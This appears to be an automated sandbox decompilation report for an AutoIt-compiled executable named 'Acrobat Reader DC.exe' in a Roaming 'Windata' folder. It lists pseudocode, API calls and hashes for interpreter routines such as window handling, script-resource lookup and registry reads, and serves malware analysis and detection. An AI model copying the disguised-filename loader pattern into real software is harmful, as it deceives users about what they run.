                                  • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                  • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1264 401100-401111 1265 401113-401119 1264->1265 1266 401179-401180 1264->1266 1268 401144-40114a 1265->1268 1269 40111b-40111e 1265->1269 1266->1265 1267 401182 1266->1267 1272 40112c-401141 DefWindowProcW 1267->1272 1270 401184-40118e call 401250 1268->1270 1271 40114c-40114f 1268->1271 1269->1268 1273 401120-401126 1269->1273 1281 401193-40119a 1270->1281 1274 401151-401157 1271->1274 1275 40119d 1271->1275 1273->1272 1277 42b038-42b03f 1273->1277 1278 401219-40121f 1274->1278 1279 40115d 1274->1279 1282 4011a3-4011a9 1275->1282 1283 42afb4-42afc5 call 40f190 1275->1283 1277->1272 1280 42b045-42b059 call 401000 call 40e0c0 1277->1280 1278->1273 1286 401225-42b06d call 468b0e 1278->1286 1284 401163-401166 1279->1284 1285 42b01d-42b024 1279->1285 1280->1272 1282->1273 1289 4011af 1282->1289 1283->1281 1291 42afe9-42b018 call 40f190 call 401a50 1284->1291 1292 40116c-401172 1284->1292 1285->1272 1290 42b02a-42b033 call 4370f4 1285->1290 1286->1281 1289->1273 1296 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 1289->1296 1297 4011db-401202 SetTimer RegisterWindowMessageW 1289->1297 1290->1272 1291->1272 1292->1273 1301 401174-42afde call 45fd57 1292->1301 1297->1281 1299 401204-401216 CreatePopupMenu 1297->1299 1301->1272 1315 42afe4 1301->1315 1315->1281
                                  C-Code - Quality: 96%
                                  			E00401100(int __edi, struct HWND__* _a4, int _a8, signed int _a12) {
                                  				struct HWND__* __ebx;
                                  				void* __esi;
                                  				signed int _t20;
                                  				long _t22;
                                  				void* _t36;
                                  				struct HWND__* _t38;
                                  				void* _t43;
                                  				void* _t49;
                                  				int _t52;
                                  				void* _t67;
                                  
                                  				_t52 = __edi;
                                  				_t38 = _a4;
                                  				if(_t38 !=  *0x497518) {
                                  					__eflags =  *0x497518;
                                  					if( *0x497518 == 0) {
                                  						goto L1;
                                  					} else {
                                  						goto L4;
                                  					}
                                  				} else {
                                  					L1:
                                  					if(_t52 >= 0x111 || _t52 < 0x12) {
                                  						__eflags = _t52 - 0x113;
                                  						if(_t52 == 0x113) {
                                  							E00401250(_a8, _t43, _t38, 0x4a8710);
                                  							goto L15;
                                  						} else {
                                  							__eflags = _t52 - 0x10;
                                  							if(__eflags <= 0) {
                                  								if(__eflags == 0) {
                                  									 *0x4974e6 = 1;
                                  									E0040F190(_t43, 0x4a8178);
                                  									goto L15;
                                  								} else {
                                  									_t20 = _t52 - 1;
                                  									__eflags = _t20 - 6;
                                  									if(_t20 > 6) {
                                  										goto L3;
                                  									} else {
                                  										switch( *((intOrPtr*)(_t20 * 4 +  &M0040122C))) {
                                  											case 0:
                                  												__eax = SetTimer(__ebx, 1, 0x2ee, 0); // executed
                                  												__eax = RegisterWindowMessageW(L"TaskbarCreated");
                                  												__eflags =  *0x4a8710;
                                  												 *0x4a95e8 = __eax;
                                  												if( *0x4a8710 != 0) {
                                  													goto L15;
                                  												} else {
                                  													__eax = CreatePopupMenu();
                                  													_pop(__esi);
                                  													 *0x4a8710 = __eax;
                                  													__eax = 0;
                                  													__eflags = 0;
                                  													_pop(__ebx);
                                  													return 0;
                                  												}
                                  												goto L35;
                                  											case 1:
                                  												KillTimer(_t38, 1);
                                  												E00401000(0x4a8710);
                                  												PostQuitMessage(0);
                                  												__eflags = 0;
                                  												return 0;
                                  												goto L35;
                                  											case 2:
                                  												goto L3;
                                  											case 3:
                                  												__eax = _a12;
                                  												__ecx = _a12;
                                  												__edx = __ax & 0x0000ffff;
                                  												__eax =  *0x497514;
                                  												__ecx = _a12 >> 0x10;
                                  												__eax = MoveWindow( *0x497514, 0, 0, __ax & 0x0000ffff, _a12 >> 0x10, 1);
                                  												goto L15;
                                  											case 4:
                                  												 *0x497514 = SetFocus( *0x497514);
                                  												goto L15;
                                  										}
                                  									}
                                  								}
                                  							} else {
                                  								__eflags = _t52 - 0x312;
                                  								if(__eflags > 0) {
                                  									__eflags = _t52 - 0x401;
                                  									if(_t52 != 0x401) {
                                  										goto L3;
                                  									} else {
                                  										E00468B0E(_t67, 0x4a8710, _t38, _a12);
                                  										goto L15;
                                  									}
                                  								} else {
                                  									if(__eflags == 0) {
                                  										__eflags =  *0x4974ec;
                                  										if(__eflags == 0) {
                                  											E004370F4( &_a8, __eflags,  &_a8);
                                  										}
                                  										goto L4;
                                  									} else {
                                  										__eflags = _t52 - 0x11;
                                  										if(_t52 == 0x11) {
                                  											asm("sbb eax, eax");
                                  											 *0x4974f0 =  ~(_a12 & 0x80000000) + 4;
                                  											 *0x4974e6 = 0;
                                  											E0040F190(_t43, 0x4a8178);
                                  											E00401A50(0x4a8178, _t49, __eflags, _t67);
                                  											_t38 = _a4;
                                  											goto L4;
                                  										} else {
                                  											__eflags = _t52 - 0x111;
                                  											if(__eflags != 0) {
                                  												goto L3;
                                  											} else {
                                  												_t36 = E0045FD57(__eflags, _t67, 0x4a8710, _a8, _a12);
                                  												__eflags = _t36 - 1;
                                  												if(_t36 != 1) {
                                  													goto L4;
                                  												} else {
                                  													L15:
                                  													__eflags = 0;
                                  													return 0;
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  					} else {
                                  						L3:
                                  						if(_t52 ==  *0x4a95e8) {
                                  							__eflags =  *0x4974ea - 1;
                                  							if( *0x4974ea == 1) {
                                  								E00401000(0x4a8710);
                                  								E0040E0C0(0x4a8710, _t67);
                                  							}
                                  						}
                                  						L4:
                                  						_t22 = DefWindowProcW(_t38, _t52, _a8, _a12); // executed
                                  						return _t22;
                                  					}
                                  				}
                                  				L35:
                                  			}














                                  APIs
                                  • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                  • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                  • PostQuitMessage.USER32(00000000), ref: 004011CB
                                  • SetTimer.USER32 ref: 004011E5
                                  • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                  • CreatePopupMenu.USER32(?,?,?,004010F8,?,?,?), ref: 00401204
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                  • String ID: TaskbarCreated
                                  • API String ID: 129472671-2362178303
                                  • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                  • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                  • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                  • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1316 40f5c0-40f5cf call 422240 1319 40f5d0-40f5e8 1316->1319 1319->1319 1320 40f5ea-40f613 call 413650 call 410e60 1319->1320 1325 40f614-40f633 call 414d04 1320->1325 1328 40f691 1325->1328 1329 40f635-40f63c 1325->1329 1330 40f696-40f69c 1328->1330 1331 40f660-40f674 call 4150d1 1329->1331 1332 40f63e 1329->1332 1335 40f679-40f67c 1331->1335 1334 40f640 1332->1334 1336 40f642-40f650 1334->1336 1335->1325 1337 40f652-40f655 1336->1337 1338 40f67e-40f68c 1336->1338 1339 40f65b-40f65e 1337->1339 1340 425d1e-425d3e call 4150d1 call 414d04 1337->1340 1341 40f68e-40f68f 1338->1341 1342 40f69f-40f6ad 1338->1342 1339->1331 1339->1334 1352 425d43-425d5f call 414d30 1340->1352 1341->1337 1344 40f6b4-40f6c2 1342->1344 1345 40f6af-40f6b2 1342->1345 1347 425d16 1344->1347 1348 40f6c8-40f6d6 1344->1348 1345->1337 1347->1340 1350 425d05-425d0b 1348->1350 1351 40f6dc-40f6df 1348->1351 1350->1336 1353 425d11 1350->1353 1351->1337 1352->1330 1353->1347
                                  C-Code - Quality: 88%
                                  			E0040F5C0(intOrPtr* _a4) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v65572;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t53;
                                  				void* _t58;
                                  				signed int _t59;
                                  				signed int _t70;
                                  				void* _t80;
                                  				void* _t87;
                                  				void* _t92;
                                  				void* _t95;
                                  				void* _t97;
                                  				void* _t98;
                                  				void* _t99;
                                  				void* _t100;
                                  
                                  				E00422240(0x10020);
                                  				_t53 = 0;
                                  				do {
                                  					_t1 = _t53 + 0x4921a0; // 0xbe4b48a3
                                  					_t2 = _t53 + 0x492198; // 0xa534c99
                                  					 *((char*)(_t97 + _t53 - 0x20)) =  *_t1;
                                  					 *((char*)(_t97 + _t53 - 0x18)) =  *_t2;
                                  					_t53 = _t53 + 1;
                                  				} while (_t53 < 8);
                                  				E00413650( &_v12, "AU3!");
                                  				E00410E60( &_v20,  &_v12, 4);
                                  				_t99 = _t98 + 0x14;
                                  				_push(_t73);
                                  				_v16 = 0;
                                  				while(1) {
                                  					_t58 = E00414D04( &_v65572, 1, 0x10000,  *_a4); // executed
                                  					_t100 = _t99 + 0x10;
                                  					if(_t58 < 0x18) {
                                  						break;
                                  					}
                                  					_t92 = _t58;
                                  					_t13 = _t92 - 0x14; // -20
                                  					_t95 = _t13;
                                  					if(_t95 <= 0) {
                                  						L10:
                                  						_t22 = _t92 - 0x14; // -20
                                  						_push(1);
                                  						_push(0xffffffec);
                                  						_push( *_a4);
                                  						_v16 = _v16 + _t22;
                                  						E004150D1(_t73, _v16 + _t22, _t92, _t95, _t110); // executed
                                  						_t99 = _t100 + 0xc;
                                  						continue;
                                  					} else {
                                  						_t87 = 0;
                                  						do {
                                  							_t80 = 0;
                                  							while(1) {
                                  								_t73 =  *((intOrPtr*)(_t97 + _t80 - 0x20));
                                  								if( *((intOrPtr*)(_t97 + _t80 - 0x20)) !=  *((intOrPtr*)(_t97 + _t80 + _t87 - 0x10020))) {
                                  									break;
                                  								}
                                  								_t73 =  *((intOrPtr*)(_t97 + _t80 - 0x1f));
                                  								__eflags =  *((intOrPtr*)(_t97 + _t80 - 0x1f)) -  *((intOrPtr*)(_t97 + _t80 + _t87 - 0x1001f));
                                  								if(__eflags == 0) {
                                  									_t73 =  *((intOrPtr*)(_t97 + _t80 - 0x1e));
                                  									__eflags =  *((intOrPtr*)(_t97 + _t80 - 0x1e)) -  *((intOrPtr*)(_t97 + _t80 + _t87 - 0x1001e));
                                  									if(__eflags == 0) {
                                  										_t73 =  *((intOrPtr*)(_t97 + _t80 - 0x1d));
                                  										__eflags =  *((intOrPtr*)(_t97 + _t80 - 0x1d)) -  *((intOrPtr*)(_t97 + _t80 + _t87 - 0x1001d));
                                  										if(__eflags != 0) {
                                  											_t80 = _t80 + 3;
                                  											break;
                                  										} else {
                                  											_t73 =  *((intOrPtr*)(_t97 + _t80 - 0x1c));
                                  											__eflags =  *((intOrPtr*)(_t97 + _t80 - 0x1c)) -  *((intOrPtr*)(_t97 + _t80 + _t87 - 0x1001c));
                                  											if(__eflags == 0) {
                                  												_t80 = _t80 + 5;
                                  												__eflags = _t80 - 0x14;
                                  												if(__eflags < 0) {
                                  													continue;
                                  												} else {
                                  													break;
                                  												}
                                  											} else {
                                  												_t80 = _t80 + 4;
                                  												break;
                                  											}
                                  										}
                                  									} else {
                                  										_t80 = _t80 + 2;
                                  										break;
                                  									}
                                  								} else {
                                  									_t80 = _t80 + 1;
                                  									break;
                                  								}
                                  								L24:
                                  							}
                                  							if(_t80 == 0x14) {
                                  								_t96 = _a4;
                                  								_t47 = _t87 + 0x14; // 0x14
                                  								_push(0);
                                  								_push(_v16 + _t47);
                                  								_push( *_a4); // executed
                                  								E004150D1(_t73,  *_a4, _t92, _a4, __eflags); // executed
                                  								E00414D04( &_v12, 1, 4,  *_t96); // executed
                                  								_v8 = 0;
                                  								_t70 = E00414D30( &_v12, "EA06");
                                  								asm("sbb eax, eax");
                                  								_t59 =  ~_t70 & 0x00000004;
                                  							} else {
                                  								goto L9;
                                  							}
                                  							goto L14;
                                  							L9:
                                  							_t87 = _t87 + 1;
                                  							_t110 = _t87 - _t95;
                                  						} while (_t87 < _t95);
                                  						goto L10;
                                  					}
                                  					L14:
                                  					return _t59;
                                  					goto L24;
                                  				}
                                  				_t59 = 3;
                                  				goto L14;
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __fread_nolock_fseek_memmove
                                  • String ID: AU3!$EA06
                                  • API String ID: 3969463491-2658333250
                                  • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                  • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                  • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                  • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1356 4115d7-4115df 1357 4115ee-4115f9 call 4135bb 1356->1357 1360 4115e1-4115ec call 411988 1357->1360 1361 4115fb-4115fc 1357->1361 1360->1357 1364 4115fd-41160e 1360->1364 1365 411610-41163b call 417fc0 call 41130a 1364->1365 1366 41163c-411656 call 4180af call 418105 1364->1366 1365->1366
                                  C-Code - Quality: 92%
                                  			E004115D7(void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                  				intOrPtr _v0;
                                  				char _v8;
                                  				char _v20;
                                  				void* _t11;
                                  				struct HINSTANCE__* _t12;
                                  				struct HINSTANCE__* _t16;
                                  				void* _t26;
                                  				void* _t27;
                                  				void* _t29;
                                  
                                  				_t29 = __esi;
                                  				_t27 = __edi;
                                  				while(1) {
                                  					_t11 = E004135BB(_t26, _t27, _t29, _a4); // executed
                                  					if(_t11 != 0) {
                                  						break;
                                  					}
                                  					_t12 = E00411988(_a4);
                                  					__eflags = _t12;
                                  					if(_t12 == 0) {
                                  						__eflags =  *0x49664c & 0x00000001;
                                  						if(( *0x49664c & 0x00000001) == 0) {
                                  							 *0x49664c =  *0x49664c | 0x00000001;
                                  							__eflags =  *0x49664c;
                                  							_push(1);
                                  							_v8 = "bad allocation";
                                  							E00417FC0(0x496640,  &_v8);
                                  							 *0x496640 = 0x482a2c;
                                  							E0041130A( *0x49664c, 0x425bee);
                                  						}
                                  						E004180AF( &_v20, 0x496640);
                                  						_v20 = 0x482a2c;
                                  						E00418105( &_v20, 0x48ceac);
                                  						asm("int3");
                                  						_t16 = GetModuleHandleW(L"mscoree.dll");
                                  						__eflags = _t16;
                                  						if(_t16 != 0) {
                                  							_t16 = GetProcAddress(_t16, "CorExitProcess");
                                  							__eflags = _t16;
                                  							if(_t16 != 0) {
                                  								return _t16->i(_v0);
                                  							}
                                  						}
                                  						return _t16;
                                  					} else {
                                  						continue;
                                  					}
                                  					L11:
                                  				}
                                  				return _t11;
                                  				goto L11;
                                  			}

                                  APIs
                                  • _malloc.LIBCMT ref: 004115F1
                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                  • std::exception::exception.LIBCMT ref: 00411626
                                  • std::exception::exception.LIBCMT ref: 00411640
                                  • __CxxThrowException@8.LIBCMT ref: 00411651
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                  • String ID: ,*H$4*H$@fI
                                  • API String ID: 615853336-1459471987
                                  • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                  • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                  • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                  • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1375 4102b0-4102c5 SHGetMalloc 1376 4102cb-4102da SHGetDesktopFolder 1375->1376 1377 425dfd-425e0e call 433244 1375->1377 1378 4102e0-41031a call 412fba 1376->1378 1379 41036b-410379 1376->1379 1387 410360-410368 1378->1387 1388 41031c-410331 SHGetPathFromIDListW 1378->1388 1379->1377 1385 41037f-410384 1379->1385 1387->1379 1389 410351-41035d 1388->1389 1390 410333-41034a call 412fba 1388->1390 1389->1387 1390->1389
                                  C-Code - Quality: 62%
                                  			E004102B0(void* __ebx, void* __edi, void* __esi) {
                                  				void* _v8;
                                  				void* _v12;
                                  				char _v16;
                                  				char _v20;
                                  				short _v24;
                                  				char _v544;
                                  				char _v1068;
                                  				char* _t21;
                                  				intOrPtr* _t24;
                                  				intOrPtr* _t29;
                                  				void* _t31;
                                  				intOrPtr* _t32;
                                  				intOrPtr* _t34;
                                  				void* _t38;
                                  				void* _t55;
                                  				void* _t57;
                                  
                                  				_t55 = __edi;
                                  				_t38 = __ebx;
                                  				_t21 =  &_v8;
                                  				__imp__SHGetMalloc(_t21); // executed
                                  				if(_t21 != 0) {
                                  					L9:
                                  					E00433244(_t55, _t38, 0x105);
                                  					return 0;
                                  				} else {
                                  					_t57 = 0; // executed
                                  					__imp__SHGetDesktopFolder( &_v12, __esi); // executed
                                  					if(_t21 == 0) {
                                  						E00412FBA( &_v544, __ebx, 0x104);
                                  						_v24 = 0;
                                  						_t29 = _v12;
                                  						_t31 =  *((intOrPtr*)( *((intOrPtr*)( *_t29 + 0xc))))(_t29, 0, 0,  &_v544,  &_v20,  &_v16, 0); // executed
                                  						if(_t31 == 0) {
                                  							__imp__SHGetPathFromIDListW(_v16,  &_v1068); // executed
                                  							_t57 = _t31;
                                  							if(_t57 != 0) {
                                  								E00412FBA(__edi,  &_v1068, 0x104);
                                  								 *((short*)(__edi + 0x208)) = 0;
                                  							}
                                  							_t34 = _v8;
                                  							 *((intOrPtr*)( *((intOrPtr*)( *_t34 + 0x14))))(_t34, _v16);
                                  						}
                                  						_t32 = _v12;
                                  						 *((intOrPtr*)( *((intOrPtr*)( *_t32 + 8))))(_t32);
                                  					}
                                  					_t24 = _v8;
                                  					 *((intOrPtr*)( *((intOrPtr*)( *_t24 + 8))))(_t24);
                                  					if(_t57 == 0) {
                                  						goto L9;
                                  					} else {
                                  						return 1;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                  • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                  • _wcsncpy.LIBCMT ref: 004102ED
                                  • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                  • _wcsncpy.LIBCMT ref: 00410340
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                  • String ID: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                  • API String ID: 3170942423-3542460094
                                  • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                  • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                  • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                  • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1393 40e4c0-40e4e5 call 403350 RegOpenKeyExW 1396 427190-4271ae RegQueryValueExW 1393->1396 1397 40e4eb-40e4f0 1393->1397 1398 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 1396->1398 1399 42721a-42722a RegCloseKey 1396->1399 1404 427210-427219 call 436508 1398->1404 1405 4271f7-42720e call 402160 1398->1405 1404->1399 1405->1404
                                  C-Code - Quality: 85%
                                  			E0040E4C0(void* __esi, void* __eflags) {
                                  				int _v8;
                                  				void* _v12;
                                  				char* _v20;
                                  				void* __ebx;
                                  				void* __edi;
                                  				long _t23;
                                  				long _t34;
                                  				signed int _t37;
                                  				int _t42;
                                  				void* _t57;
                                  				char* _t58;
                                  
                                  				E00403350(__esi);
                                  				_t23 = RegOpenKeyExW(0x80000001, L"Software\\AutoIt v3\\AutoIt", 0, 1,  &_v12); // executed
                                  				if(_t23 == 0) {
                                  					_t42 = 0;
                                  					__eflags = RegQueryValueExW(_v12, L"Include", 0, 0, 0,  &_v8);
                                  					if(__eflags == 0) {
                                  						_push(_t57);
                                  						_push( ~(0 | __eflags > 0x00000000) | (_v8 + 0x00000001) * 0x00000002);
                                  						E0043652F(__eflags,  &_v20, E004115D7(_t57, __esi, __eflags));
                                  						_t58 = _v20;
                                  						_t55 = _v12;
                                  						_t34 = RegQueryValueExW(_v12, L"Include", 0, 0, _t58,  &_v8);
                                  						__eflags = _t34;
                                  						if(_t34 == 0) {
                                  							_t37 = _v8 >> 1;
                                  							_v8 = _t37;
                                  							__eflags = 0;
                                  							 *((short*)(_t58 + _t37 * 2)) = 0;
                                  							E00402160(__esi, _t58, _t55, _t58);
                                  							_t42 = 1;
                                  						}
                                  						E00436508( &_v20);
                                  					}
                                  					RegCloseKey(_v12);
                                  					return _t42;
                                  				} else {
                                  					return 0;
                                  				}
                                  			}















                                  APIs
                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                  • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: QueryValue$CloseOpen
                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                  • API String ID: 1586453840-614718249
                                  • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                  • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                  • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                  • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1410 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                  C-Code - Quality: 100%
                                  			E00410570() {
                                  				struct HWND__* _t2;
                                  				struct HWND__* _t3;
                                  				int _t6;
                                  
                                  				_t2 = CreateWindowExW(0, L"AutoIt v3", L"AutoIt v3", 0xcf0000, 0x80000000, 0x80000000, 0x12c, 0x64, 0, 0,  *0x497520, 0); // executed
                                  				 *0x497518 = _t2; // executed
                                  				_t3 = CreateWindowExW(0, L"edit", 0, 0x50b008c4, 0, 0, 0, 0, _t2, 1,  *0x497520, 0); // executed
                                  				 *0x497514 = _t3; // executed
                                  				ShowWindow( *0x497518, 0); // executed
                                  				_t6 = ShowWindow( *0x497518, 0); // executed
                                  				return _t6;
                                  			}







                                  APIs
                                  • CreateWindowExW.USER32 ref: 004105A5
                                  • CreateWindowExW.USER32 ref: 004105CE
                                  • ShowWindow.USER32(?,00000000), ref: 004105E4
                                  • ShowWindow.USER32(?,00000000), ref: 004105EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
